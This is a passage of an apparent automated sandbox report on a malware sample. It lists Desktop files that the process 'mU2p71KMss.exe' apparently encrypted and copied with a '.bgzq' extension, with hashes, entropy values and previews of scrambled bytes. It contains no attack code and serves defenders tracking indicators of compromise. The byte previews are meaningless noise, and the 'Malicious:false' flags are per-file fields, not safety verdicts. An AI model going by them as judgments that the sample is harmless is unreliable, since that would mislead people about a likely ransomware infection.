                                                                                                SSDEEP:24:0iRvfVaygnjZg8600+sxuQZHARvPr4h/Wl56EzBn7f/6GIL6Za8DR5XfzIbD:n3VcjZy0xsZgBsQaEVu4aErfzSD
                                                                                                MD5:E17200BFC33DBCCC6423C38C617A8CC7
                                                                                                SHA1:DE001565FED592694CD5D2ABE66F3E3CD949379D
                                                                                                SHA-256:BBDFD242A9115FA80E502F68743DB1E62CADD533D909CE1DA7B795AB81118F9E
                                                                                                SHA-512:AF40B089D510D24C9CB95C24270941C4B971335DABE65B1F636D1DE6F4629E6169F7E6823245B88C5E7D62FF33C3BBE73FBE5497C18724A5BBB4A4E398981FC8
                                                                                                Malicious:false
                                                                                                Preview:UNKRL...."Jp.~S..c<..X*.,Q0o.>......y....W...S8W.RL....E..G.).!..(?..P&&E...n..F..1Yz.s;....B.:..d.........k_..hU..C..!|.<.(d&.-.,..l.h4&.....?....Y...Q4..'...E6-&X.t2.R.:R..e.&`w.j9.......3.w.....mm.;..C...D6.H...WB..gL..f...:..QO...<U..H......F.KdN.....1J.U.~gO.v..|....UX.<..">.i.t..<...4...O..S0.s......H...=K..ZK.'......j......V....Yb...rm.',..J6m.-...;...t...l...C..o.......*...y....E.w6.y......H..v.....H......L.U.b2H...NpBb.....?.`..'..j,.%u..qJ.l..l..HR.T>}._.=Ma....:k2f.34..h..$.../.0.w~.$(.;.+.....Mq.Ac.R..E.'..d..P..A...\n<.L......V....T.....r)....E5.<!..>#T0....Auz.]+.9...w.]Z....2%....\...2C..p6.;.....`P24o.(....u...4.,..............'.T....v.x.A.4.h..+..*.._..(.X(....[<.......n..%8.I..z.e.....}T.......).c..V..q......)eN...>=...^......5...$.4...V;.:..v&D+....$.j.56...k..P[..f`....X4...lH|..h%...Y....1....O........;..y.5)..........A.....Y.&l.&...7.'..<`.&.#..qYS(. V.h3.(.....}^4.../<D...u.~..wp.|N.L..3...9.c..$....h\..........S.A.&q..x.$\D..>..m

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\ZIPXYXWIOY.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.872204181397775
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:B3YKESonaI6ZBuBhzDzCPhxSVfbLynzzgP6ZvebTImOp0f7LDXfzIbD:QNn1QBKDmmfbqzh5ebeqfDfzSD
                                                                                                MD5:5A325FECB9D8C3E6216CCF8BB54476CC
                                                                                                SHA1:AE60D36AD882787BEF75C20787278F2E223D3824
                                                                                                SHA-256:9562E8A75464809F00A964262A3ABD066AEB8A2A25A053C2344F3D5371477D86
                                                                                                SHA-512:677E4079D5C5B2C8A926A068D21B5980166AC039CBE6C0D9E7659FC036EDFCF63C596C7EFA8A17F91835EB830E43FBC7448F8BFAF94EEC02500997DAD5E51A15
                                                                                                Malicious:false
                                                                                                Preview:ZIPXY;..b.2.2%N%@....CC.-t..0.B.{.....`.........*.!..v?s...j.......9Z.vR..SoK....A.M.M.1[..d..F.J.S.F...8.1....5..\jq.Y......'.!...q..f.A8..]oe..d........A.._.1.$\..............?I."....wj...^.....3.;4.ghc7...+..u!..o.....&....@)i-j}ik|.<:...........3M.".9.2.Ax..[U..Of6.<ei..hu.+..4c...O....Z...EA....^]ZK<d..7}..V{...r...#.. .:..y...Ok.#"..1....U.&..Hq.{C......\....@.m9...Z`......"g..`....X.P...9*.../......_T.{......o.O.B.^O.....]G.6.ty...Jm&..+g~hf..Q."qp.TB.D..F.>/..A...9.*......8~...\...:.L.^O*..V..lGF.|.:...k...;.".....Wr.E`.~.P.......$e...(.*....+..........l.8.\W......"..*...@.i.R.|j.P'.......a..E.9.0..:..."..n..f.V..G.....N..{..c.......(..}....d....p...D.;...[.....Kn..C..A.8^).q.>N2..&z..J..2N...(.=.>..........%..M...$..........~.`.5..&K.......9 .h......$..U`.~k.<..QV.:j.@<.o....#j....K5.....?'...f..D.7.n$f...Y;..2.....hk.,..!."J.XbR|V......J.....m.\.q...w....)..5Gm.|.TvG,..5..3.|..b.N...)o.......u,.s.v....C...]...C.Q.XS.%q..<j..05....

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\ZIPXYXWIOY.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.872204181397775
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:B3YKESonaI6ZBuBhzDzCPhxSVfbLynzzgP6ZvebTImOp0f7LDXfzIbD:QNn1QBKDmmfbqzh5ebeqfDfzSD
                                                                                                MD5:5A325FECB9D8C3E6216CCF8BB54476CC
                                                                                                SHA1:AE60D36AD882787BEF75C20787278F2E223D3824
                                                                                                SHA-256:9562E8A75464809F00A964262A3ABD066AEB8A2A25A053C2344F3D5371477D86
                                                                                                SHA-512:677E4079D5C5B2C8A926A068D21B5980166AC039CBE6C0D9E7659FC036EDFCF63C596C7EFA8A17F91835EB830E43FBC7448F8BFAF94EEC02500997DAD5E51A15
                                                                                                Malicious:false
                                                                                                Preview:ZIPXY;..b.2.2%N%@....CC.-t..0.B.{.....`.........*.!..v?s...j.......9Z.vR..SoK....A.M.M.1[..d..F.J.S.F...8.1....5..\jq.Y......'.!...q..f.A8..]oe..d........A.._.1.$\..............?I."....wj...^.....3.;4.ghc7...+..u!..o.....&....@)i-j}ik|.<:...........3M.".9.2.Ax..[U..Of6.<ei..hu.+..4c...O....Z...EA....^]ZK<d..7}..V{...r...#.. .:..y...Ok.#"..1....U.&..Hq.{C......\....@.m9...Z`......"g..`....X.P...9*.../......_T.{......o.O.B.^O.....]G.6.ty...Jm&..+g~hf..Q."qp.TB.D..F.>/..A...9.*......8~...\...:.L.^O*..V..lGF.|.:...k...;.".....Wr.E`.~.P.......$e...(.*....+..........l.8.\W......"..*...@.i.R.|j.P'.......a..E.9.0..:..."..n..f.V..G.....N..{..c.......(..}....d....p...D.;...[.....Kn..C..A.8^).q.>N2..&z..J..2N...(.=.>..........%..M...$..........~.`.5..&K.......9 .h......$..U`.~k.<..QV.:j.@<.o....#j....K5.....?'...f..D.7.n$f...Y;..2.....hk.,..!."J.XbR|V......J.....m.\.q...w....)..5Gm.|.TvG,..5..3.|..b.N...)o.......u,.s.v....C...]...C.Q.XS.%q..<j..05....

                                                                                                C:\Users\user\Desktop\PALRGUCVEH.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.864774849611116
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RJbdMxgPzVpX21Xy7xuIDja6S4L/lkIsxxxnThCBnpwK/DW4vfgoAjnBveWyNuCO:RJwMyAxuIDja8/CIsyBntW6Q6Nh5/fz6
                                                                                                MD5:6C9B97599CD3176A1240C11E59CA520F
                                                                                                SHA1:07251511D168F6F656D1F9D0C2E56F4F395B70EC
                                                                                                SHA-256:D26F3753F965EF6C3196718B8B8A49A97AAE294177340E00C80627D7318DD198
                                                                                                SHA-512:3F9A41221F8900521DEC8736600C199C9B55B9E45DA48C66471DB485A2D90D4F7D4BE57CECFB03CF30EFBBC72BE7DA7A53EF5FEB77BA8E81E0DC51B0EFBEE390
                                                                                                Malicious:false
                                                                                                Preview:PALRG....(..v..C..^.%!..../R.BMn+i2.~i...t..3...1... ...U..C......!.Rw.lq].\o...,....>.%.%.Cw....EO......'.J.T...tb[:.......s....9...).g.5v.=He..[.......sO......R....M...g.:.r.-..~......X.....Rll*;....]..........K.....Q.B.{.....>.2cbZ.&..>H0tH...?..T&G.k`}..o..J.. ...A^...5....F...[Hbm...+....s.w.w..({.....fE.*%.[...........S......M.o...,..#6q.....~5#.$.o......~.a.....`P65.<...=3F.r.>...K|..].wr..s.3.aG...;.e.M..g..)D..W....N.G.E.;.m.bNF.....'.}.e..*1....Kl9.$.q.....+..v.i...d......11z.gX.".6t0.\+[...`.g.....*g3.M5.~w....9....lr 5.p.%.N!^6....m.....-.z.......;v.........y]|...o....p....S..S..)...(o.\9... ...[.....K..i.........`.(DT.Z..h........".E....0+..F..!8.....-.?...x..Ye...c..D.V..<w.(....Y..<9...hb...C...oJ..e...>J..|v-.._>7....\..w...W....9.)@....#.n-.[....:./.~Q5F......_`..<.8..4..;.....@]0$>H.8.L..c...c.k.X..5Q.2....).%.C..........|K..RCw m..W.2o.../..{i3.\p....p........?.iO-..|.......K.R.zU.W$.R.....C.mM...m...3.....NS.o....

                                                                                                C:\Users\user\Desktop\PALRGUCVEH.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.864774849611116
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RJbdMxgPzVpX21Xy7xuIDja6S4L/lkIsxxxnThCBnpwK/DW4vfgoAjnBveWyNuCO:RJwMyAxuIDja8/CIsyBntW6Q6Nh5/fz6
                                                                                                MD5:6C9B97599CD3176A1240C11E59CA520F
                                                                                                SHA1:07251511D168F6F656D1F9D0C2E56F4F395B70EC
                                                                                                SHA-256:D26F3753F965EF6C3196718B8B8A49A97AAE294177340E00C80627D7318DD198
                                                                                                SHA-512:3F9A41221F8900521DEC8736600C199C9B55B9E45DA48C66471DB485A2D90D4F7D4BE57CECFB03CF30EFBBC72BE7DA7A53EF5FEB77BA8E81E0DC51B0EFBEE390
                                                                                                Malicious:false
                                                                                                Preview:PALRG....(..v..C..^.%!..../R.BMn+i2.~i...t..3...1... ...U..C......!.Rw.lq].\o...,....>.%.%.Cw....EO......'.J.T...tb[:.......s....9...).g.5v.=He..[.......sO......R....M...g.:.r.-..~......X.....Rll*;....]..........K.....Q.B.{.....>.2cbZ.&..>H0tH...?..T&G.k`}..o..J.. ...A^...5....F...[Hbm...+....s.w.w..({.....fE.*%.[...........S......M.o...,..#6q.....~5#.$.o......~.a.....`P65.<...=3F.r.>...K|..].wr..s.3.aG...;.e.M..g..)D..W....N.G.E.;.m.bNF.....'.}.e..*1....Kl9.$.q.....+..v.i...d......11z.gX.".6t0.\+[...`.g.....*g3.M5.~w....9....lr 5.p.%.N!^6....m.....-.z.......;v.........y]|...o....p....S..S..)...(o.\9... ...[.....K..i.........`.(DT.Z..h........".E....0+..F..!8.....-.?...x..Ye...c..D.V..<w.(....Y..<9...hb...C...oJ..e...>J..|v-.._>7....\..w...W....9.)@....#.n-.[....:./.~Q5F......_`..<.8..4..;.....@]0$>H.8.L..c...c.k.X..5Q.2....).%.C..........|K..RCw m..W.2o.../..{i3.\p....p........?.iO-..|.......K.R.zU.W$.R.....C.mM...m...3.....NS.o....

                                                                                                C:\Users\user\Desktop\PALRGUCVEH.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.861158011215116
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WnFjob+hfxwgIJHr66xuNPvGAm8nGE0OTObEbJ77U7VQRfGoFDHp3XfzIbD:+Fo2yJrUmAb0/EbJ8764oFDJnfzSD
                                                                                                MD5:6546830A5D63A5E85531231AC5D29811
                                                                                                SHA1:7EF53298D86073175A9309F935D6FAD811FFC6A1
                                                                                                SHA-256:897F565D772A1EA5DC3EBA2B83057ECFF73E62FD538B1C86FE744B5E9082D115
                                                                                                SHA-512:D64E7E592E29581B06C4B6E4A5A0A5BBCD3D9ED93F522CB3AF47DD01AE41F5AB6B0B575987843CDA6190DEC03C6CF1B91202ED0362574B15F0E29B5E7A33F023
                                                                                                Malicious:false
                                                                                                Preview:PALRG....C.Z oJ.......}.......5..k.h.bv..l5.Kge\.6_....b..h/]V.i..(.B.#..X.i1b..1..D.. ..t1_,..a...T.n..w?..^..T.9....."..T..fx.%K..D.{.Q..H.8K[.Y.....h.3..{}U..........Z....{*i.y..i.w&G.M.Z..f3...n............9...w.s......Y........3....f.....I.3P.V......H)r...{e.*..%.....<.C.|>g6.T:.Q.....3_...........Yn;.2..6.t7/=n......Y.9X.Q....,.'...~..(...g@.`.B_V.1.x...:..*.4....3.Y...|*.<9..'3..u.T...I.q.3.v.Wj...c....R....%.;...~......V.i.....9O..5.c@...)..(.-b..K...l..l........-..L./+.j...4.1..7..(.6....4t....@..H...t+8CS...O.*.....d!.<..J:Z...o...s<o.....I^.....MmY.5i'.0q.Z.......D....._....d@....]`.......}.x\.>..v......G._.Q$.T!...(........O(~..V..=..t...t..h;..1A...0...u.K.T...d!$.%..$....e.tn...rOL.A........,.v...:2h.0.=J',NJ..8..=d<.>E...s..x.^....*...=.>...H.R3...A.O..\.*.X...qE-\Gb8...[Pg.T...j..(.H....p..E.mq.BDx..{uR..].=-....<...a,I...'...6...`......8!........`Bt...;.......E{Cbz.| .L]..%.IU.....Z..KF.Qv.t%....S9...yP.........?.;..`..#

                                                                                                C:\Users\user\Desktop\PALRGUCVEH.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.861158011215116
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WnFjob+hfxwgIJHr66xuNPvGAm8nGE0OTObEbJ77U7VQRfGoFDHp3XfzIbD:+Fo2yJrUmAb0/EbJ8764oFDJnfzSD
                                                                                                MD5:6546830A5D63A5E85531231AC5D29811
                                                                                                SHA1:7EF53298D86073175A9309F935D6FAD811FFC6A1
                                                                                                SHA-256:897F565D772A1EA5DC3EBA2B83057ECFF73E62FD538B1C86FE744B5E9082D115
                                                                                                SHA-512:D64E7E592E29581B06C4B6E4A5A0A5BBCD3D9ED93F522CB3AF47DD01AE41F5AB6B0B575987843CDA6190DEC03C6CF1B91202ED0362574B15F0E29B5E7A33F023
                                                                                                Malicious:false
                                                                                                Preview:PALRG....C.Z oJ.......}.......5..k.h.bv..l5.Kge\.6_....b..h/]V.i..(.B.#..X.i1b..1..D.. ..t1_,..a...T.n..w?..^..T.9....."..T..fx.%K..D.{.Q..H.8K[.Y.....h.3..{}U..........Z....{*i.y..i.w&G.M.Z..f3...n............9...w.s......Y........3....f.....I.3P.V......H)r...{e.*..%.....<.C.|>g6.T:.Q.....3_...........Yn;.2..6.t7/=n......Y.9X.Q....,.'...~..(...g@.`.B_V.1.x...:..*.4....3.Y...|*.<9..'3..u.T...I.q.3.v.Wj...c....R....%.;...~......V.i.....9O..5.c@...)..(.-b..K...l..l........-..L./+.j...4.1..7..(.6....4t....@..H...t+8CS...O.*.....d!.<..J:Z...o...s<o.....I^.....MmY.5i'.0q.Z.......D....._....d@....]`.......}.x\.>..v......G._.Q$.T!...(........O(~..V..=..t...t..h;..1A...0...u.K.T...d!$.%..$....e.tn...rOL.A........,.v...:2h.0.=J',NJ..8..=d<.>E...s..x.^....*...=.>...H.R3...A.O..\.*.X...qE-\Gb8...[Pg.T...j..(.H....p..E.mq.BDx..{uR..].=-....<...a,I...'...6...`......8!........`Bt...;.......E{Cbz.| .L]..%.IU.....Z..KF.Qv.t%....S9...yP.........?.;..`..#

                                                                                                C:\Users\user\Desktop\QCOILOQIKC.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.842664607981791
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:N7bsmcXenUW9PPGQydJ4M6y5ftnTHI4rSfiwEKbmNuxw3HqO7GpQI1k7wEjMDng3:N/ZcXO9PPbydJ4M60hrSf6KbmtuQCk0w
                                                                                                MD5:7B5280823C7A307599E850177985CB91
                                                                                                SHA1:46CD07FF428F5917829376950D6E3CF65F0043C2
                                                                                                SHA-256:B107485348A0AE8D81A5D273B77307418B433247A5F231A56E173A2441843A2D
                                                                                                SHA-512:369E2B5D99D5EF84AC50AFA1B3BAC5682473F8BC4E9247D1CF0815818DF64276B8B0BA5A0A29D56182A6120F510C5983100D8F187E9C72AF6231AE991BED48DF
                                                                                                Malicious:false
                                                                                                Preview:QCOIL....J.....f....9.:....p........a".r..c)...R.k.5.V?.@`8FY=....... b..b..l\...X...*}x.&.{..].NI.3.... ....k8$XL..;,....&..O..E.5m_.!..XP..5H/}n..I..q.W\.....`....e...{.W.....:.^.w.;r/..t........!.....`........<.|d...#....v...i.._.,... ..H....R6.))%....y...9\....J~...SB.$...C..g=CJ9(.....2|. x...ht.!Q..,I.&....tB..p$../..N.>p...B.([./.C..........(...0...w..s..'...g......7.Z.g1-.i.OJ]..F.a.>.Z.).NU.MM..l...F..Q-.&2|I#.....z'..._ ....Q.!.....;.U. 7Jf..W@....qcXK.yZ-.l......g/..NH..?j14....S.`...Y.2..{...hN.....f2.8..4zf,.z....X.[Q.{.le~). $...Q.5WiyO.....ur.j.y.%..2.6.5..Zj.U.ii..F.Q.I..~5..k. &..iS..F..B..[39~......xf.R...5........L....d.3......-(.y+.t...f.9..C...wz.].3W...wV./...N..V|~...a5.Q.p.7Z.&>T.+nX.G.P...N#....c.}.h5....p|k+S.U$+...N....i8/..o.r|\..).Q.AL..I?..6<..g.)y....Z..A...._&.w.d....`Z1..1=.Y..~......GL.....A.......ay..CuZ.pP...T.l.Ps..{.w.KI......]A...b....D....../....F.,D..$*.lF....6`.HBu..D..Q2....X..).U.Y...<i..i[

                                                                                                C:\Users\user\Desktop\QCOILOQIKC.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.842664607981791
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:N7bsmcXenUW9PPGQydJ4M6y5ftnTHI4rSfiwEKbmNuxw3HqO7GpQI1k7wEjMDng3:N/ZcXO9PPbydJ4M60hrSf6KbmtuQCk0w
                                                                                                MD5:7B5280823C7A307599E850177985CB91
                                                                                                SHA1:46CD07FF428F5917829376950D6E3CF65F0043C2
                                                                                                SHA-256:B107485348A0AE8D81A5D273B77307418B433247A5F231A56E173A2441843A2D
                                                                                                SHA-512:369E2B5D99D5EF84AC50AFA1B3BAC5682473F8BC4E9247D1CF0815818DF64276B8B0BA5A0A29D56182A6120F510C5983100D8F187E9C72AF6231AE991BED48DF
                                                                                                Malicious:false
                                                                                                Preview:QCOIL....J.....f....9.:....p........a".r..c)...R.k.5.V?.@`8FY=....... b..b..l\...X...*}x.&.{..].NI.3.... ....k8$XL..;,....&..O..E.5m_.!..XP..5H/}n..I..q.W\.....`....e...{.W.....:.^.w.;r/..t........!.....`........<.|d...#....v...i.._.,... ..H....R6.))%....y...9\....J~...SB.$...C..g=CJ9(.....2|. x...ht.!Q..,I.&....tB..p$../..N.>p...B.([./.C..........(...0...w..s..'...g......7.Z.g1-.i.OJ]..F.a.>.Z.).NU.MM..l...F..Q-.&2|I#.....z'..._ ....Q.!.....;.U. 7Jf..W@....qcXK.yZ-.l......g/..NH..?j14....S.`...Y.2..{...hN.....f2.8..4zf,.z....X.[Q.{.le~). $...Q.5WiyO.....ur.j.y.%..2.6.5..Zj.U.ii..F.Q.I..~5..k. &..iS..F..B..[39~......xf.R...5........L....d.3......-(.y+.t...f.9..C...wz.].3W...wV./...N..V|~...a5.Q.p.7Z.&>T.+nX.G.P...N#....c.}.h5....p|k+S.U$+...N....i8/..o.r|\..).Q.AL..I?..6<..g.)y....Z..A...._&.w.d....`Z1..1=.Y..~......GL.....A.......ay..CuZ.pP...T.l.Ps..{.w.KI......]A...b....D....../....F.,D..$*.lF....6`.HBu..D..Q2....X..).U.Y...<i..i[

                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.859047650510681
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7eL5FrtnRw5OlxlWJn71UpEKR+0aAOBX0abasgkx6XfzIbD:7eNFrdCgxcJnJoEK8VAkX0abasgkifz6
                                                                                                MD5:9B42520E983B420B7CD542752F13D48F
                                                                                                SHA1:4FDAEBC0428EF2FB0F776B133B45731956F7C4E9
                                                                                                SHA-256:5F21BB23A8F27DC802B10D13FCB9CB600AC006079C62B7C1D35A207C4C258645
                                                                                                SHA-512:1240F916E60211915BDA60D2F2635AB05CE80BEB0605532051D366FF4EE08C0FC300D6D70C8345200EE9721BE26F0DED041CBCC6ADB38320DA91CB07E36BED10
                                                                                                Malicious:false
                                                                                                Preview:SQSJK.;..........Am.j.4|.<.k."n1.'..o".K...g.=e.^.FFe..%.....3.m4z."...f.}....o.q.Z.d.*.u]..g..b..8+D..".....T..Ow..o......>Y.POb.f.In.9*.!@,.K..Y..si...+<v...pv..s#..........`,.w..Z....."..k..r.@...H..3d...u....U.....1.U.....n9.G.N.#.m..........C....^..h...(.9.0i......C .M.A.'7..x....%~.....Di.=.....N..aQ.......V......r._.hA.9...d....(U?.m..W.....%c.,.......T[....W.y.M..\k..4.o...l..>E........]<.M....4%.O....v..lS..<B..6.|W.G^,..F..{f..[<..........g=.a.L..H..+.b.0f...$./{8..$>&..m_..f.......h.=...(....%wX.8#o.sZ.>j"..r..V.=Ns%..k-..../..Q.94...Q\W...gC.3!K.<..`..P..+.p..b3,......}._c.yW.........v.Z^WC.G...V..l....O..!!.?.xU3..q..8.X~..ct..V..5D.,.Y..y_....%B-c.. .2,+.4..D.Or.Yk.J.&....C.......)>.#~...t..i.p;#^!8.*...pN..h.Wgg..q...G....W.VxAV.......^..0.9.(../..X....D.g..X.......S5..Y.....5D....Q.......j...#...sf....^.......=....[..n.......n..B...,....S@).,..1.....l">Q....u.B<.8v..k`.{..].UY ..!`....c..V.4d.....5hh*8...."....c3......

                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.859047650510681
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7eL5FrtnRw5OlxlWJn71UpEKR+0aAOBX0abasgkx6XfzIbD:7eNFrdCgxcJnJoEK8VAkX0abasgkifz6
                                                                                                MD5:9B42520E983B420B7CD542752F13D48F
                                                                                                SHA1:4FDAEBC0428EF2FB0F776B133B45731956F7C4E9
                                                                                                SHA-256:5F21BB23A8F27DC802B10D13FCB9CB600AC006079C62B7C1D35A207C4C258645
                                                                                                SHA-512:1240F916E60211915BDA60D2F2635AB05CE80BEB0605532051D366FF4EE08C0FC300D6D70C8345200EE9721BE26F0DED041CBCC6ADB38320DA91CB07E36BED10
                                                                                                Malicious:false
                                                                                                Preview:SQSJK.;..........Am.j.4|.<.k."n1.'..o".K...g.=e.^.FFe..%.....3.m4z."...f.}....o.q.Z.d.*.u]..g..b..8+D..".....T..Ow..o......>Y.POb.f.In.9*.!@,.K..Y..si...+<v...pv..s#..........`,.w..Z....."..k..r.@...H..3d...u....U.....1.U.....n9.G.N.#.m..........C....^..h...(.9.0i......C .M.A.'7..x....%~.....Di.=.....N..aQ.......V......r._.hA.9...d....(U?.m..W.....%c.,.......T[....W.y.M..\k..4.o...l..>E........]<.M....4%.O....v..lS..<B..6.|W.G^,..F..{f..[<..........g=.a.L..H..+.b.0f...$./{8..$>&..m_..f.......h.=...(....%wX.8#o.sZ.>j"..r..V.=Ns%..k-..../..Q.94...Q\W...gC.3!K.<..`..P..+.p..b3,......}._c.yW.........v.Z^WC.G...V..l....O..!!.?.xU3..q..8.X~..ct..V..5D.,.Y..y_....%B-c.. .2,+.4..D.Or.Yk.J.&....C.......)>.#~...t..i.p;#^!8.*...pN..h.Wgg..q...G....W.VxAV.......^..0.9.(../..X....D.g..X.......S5..Y.....5D....Q.......j...#...sf....^.......=....[..n.......n..B...,....S@).,..1.....l">Q....u.B<.8v..k`.{..].UY ..!`....c..V.4d.....5hh*8...."....c3......

                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.815514089990526
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:/W4svFwnT4MUJEqOmvbAM9e86aaLelz5rZZ7gvnGQq9m35qf1yJH1FQbvW23nKXu:OFeUM+5vbAg69g5rZZUZIA8f1kHyvW29
                                                                                                MD5:C230E6CC01F4D7038D3E8C36B1A1AC13
                                                                                                SHA1:91C122606A2D76323BCA10C1119EDE632DC40DCD
                                                                                                SHA-256:BDBA15C7DDF454823908CC708DF4DA57D318D320735C14A6BB962941AB5C4829
                                                                                                SHA-512:B530AB2FCFF7832998FA27C1D7DFFCF106409563F39F28ACF6DEEC921306796AD253D619CC92A34E4FADEFBD9D16986479BE1BFE2E66FD4BDF7F9A1AD13B2E34
                                                                                                Malicious:false
                                                                                                Preview:SQSJKbo.....}.).z..!.i......Rv......IL..@e..|F..%.l..[....x....]..J.R1...A."...s...J...Z.OD."R.*..,.x..J..VP#H.A.j..A.Rfd.1..b...#...]..uj..X..[...|H.J.&....V.7v..mu.,.P....?...P..W. vHc..q!.\.......|..n..F5..z...B .MQ..g.^.<...M.....QX=...I.....z.H.zk..F.zB.G.E...V....s.(.ZA.......&...1e8.=.+=8....).@T>..%E..i..+.?.[..V..}.$....p.-}.[.1k..D...;...r..1....F&".J^d....%m...|.n.6.....X...m..<..&V_..{ .".9..&....9[.g.........{W..j.^..+.cmD...%.#...v.A....mw.%....0.0KbW...ge.0.yLx!.}..l...\:..a)....S.....V.N....K'........_Y....+s.[.ri2-...O.o.......6Q....r.V..z.N....=.p8....FZ!_]Q.d.+!..:..T7%@e.F.3.....Fv..#......4g.z.m1Y..o..$...D..92(...9+.Nk_...H.G...kD..ck......3.........R.L.D`...4.J.......).DO9"...Nd...1.g..B8oll0)..1l...3.y..x...}.Y..F...z5.V.t..4.!.h.6P.=.Be..M.[...T;H.Gl\.B`....i..&`.|..mHq...=Q....If.^...F]....x?Voq.H2h..'..[5....].....)...{.A.............51.<O}..$.G........i.QG'..n6....QA@...0u.a.-yQ...-..2Qp.i.:..[N...aj..$jX..

                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.815514089990526
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:/W4svFwnT4MUJEqOmvbAM9e86aaLelz5rZZ7gvnGQq9m35qf1yJH1FQbvW23nKXu:OFeUM+5vbAg69g5rZZUZIA8f1kHyvW29
                                                                                                MD5:C230E6CC01F4D7038D3E8C36B1A1AC13
                                                                                                SHA1:91C122606A2D76323BCA10C1119EDE632DC40DCD
                                                                                                SHA-256:BDBA15C7DDF454823908CC708DF4DA57D318D320735C14A6BB962941AB5C4829
                                                                                                SHA-512:B530AB2FCFF7832998FA27C1D7DFFCF106409563F39F28ACF6DEEC921306796AD253D619CC92A34E4FADEFBD9D16986479BE1BFE2E66FD4BDF7F9A1AD13B2E34
                                                                                                Malicious:false
